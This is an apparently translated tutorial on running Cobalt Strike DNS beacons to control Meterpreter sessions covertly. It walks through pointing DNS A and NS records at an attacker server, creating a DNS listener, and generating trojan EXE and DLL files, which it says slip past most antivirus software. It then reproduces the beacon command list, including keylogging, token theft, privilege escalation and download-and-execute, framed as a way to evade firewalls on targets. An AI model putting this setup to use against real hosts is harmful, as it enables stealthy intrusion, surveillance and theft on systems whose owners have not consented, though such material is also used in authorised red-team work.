Control Meterpreter through DNS Tunnel

Control Meterpreter through DNS Tunnel
Using DNS to control targets and penetration benefits doesn't I need to talk about more? As we all know, If you do not open a port, you can bypass most of the firewalls, Which is concealed. Cobalt Strike has a beacons function, which can transmit data through DNS, HTTP, and SMB. Below I will take DNS as an example to demonstrate it.

1. Domain Name settings

First, we have A Domain Name and create A record pointing to our metasploit server. Remember not to use CDN or something.

Then create two or three ns records pointing to the created A record.

In this way, we can find our metasploit server through dns.

2. Cobalt Strike settings

In the Cobalt Strike, we add a listener.

The HOST field is the IP address of the metasplit service. When you click Save, you are required to enter your NS record. Here, the three created

We have set the listener. Next we will create a trojan test.

3. Trojan generation

Find the windows Trojan generated in attack-> packages

Listener: select the one we just created (there are two, select the one with DNS), and output exe, EXE with service, dll, etc. (I have tested the connection method and used the DLL Trojan generated by DNS to pass through a large part of anti-virus software)

We put the generated DNS. EXE in the Virtual Machine for running.

Port status before running

Port status after running

No new port is enabled. Check if you want to capture packets.

DNS is used.

Go back to Cobalt Strike and open beacons manager and find a server responding to us.

Right-click the manage menu, select sleep to set the corresponding time, and select interact to go to the operation interface.

The first thing we need to set is the transmission mode, which includes dns, dns-txt, http, and smb. Here we use DNS and select the dns and dns-txt, the former transfers less data and the latter delivers more data.

Here I set it to mode dns-txt (here we can use the TAB to complete the command)

Enter help to view supported commands.

Command Description

-------

Bypassuac Spawn a session in a high integrity process

Cd Change directory

Checkin Call home and post data

Clear Clear beacon queue

Download Download a file

Execute Execute a program on target

Exit Terminate the beacon session

Getsystem Attempt to get SYSTEM

Getuid Get User ID

Help Help menu

Inject Spawn a session in a specific process

Keylogger start the keystroke logger

Keylogger stop Stop the keystroke logger

Message Display a message to user on desktop

Meterpreter Spawn a Meterpreter session

Link Connect to a Beacon peer over SMB

Mode dns Use dns a as data channel (DNS beacon only)

Mode dns-txt Use dns txt as data channel (DNS beacon only)

Mode http Use HTTP as data channel

Mode smb Use SMB peer-to-peer communication

Rev2self Revert to original token

Shell Execute a command via cmd.exe

Sleep Set beacon sleep time

Socks Start SOCKS4a server to relay traffic

Socks stop Stop SOCKS4a server

Spawn Spawn a session

Spawnto Set executable to spawn processes

Steal_token Steal access token from a process

Task Download and execute a file from a URL

Timestomp Apply timestamps from one file to another

Unlink Disconnect from parent Beacon

Upload Upload a file

Here we will demonstrate several common commands

Getuid

Execute runs the executable program (shell commands cannot be executed)

Shell

Meterpreter returns a response from meterpreter.

The remaining commands will be available for you.

The advantage of this is that it is relatively invisible to the target host. The disadvantage is that the result returned by each command is relatively slow, and it is good in the firewall.

[Via @ drops]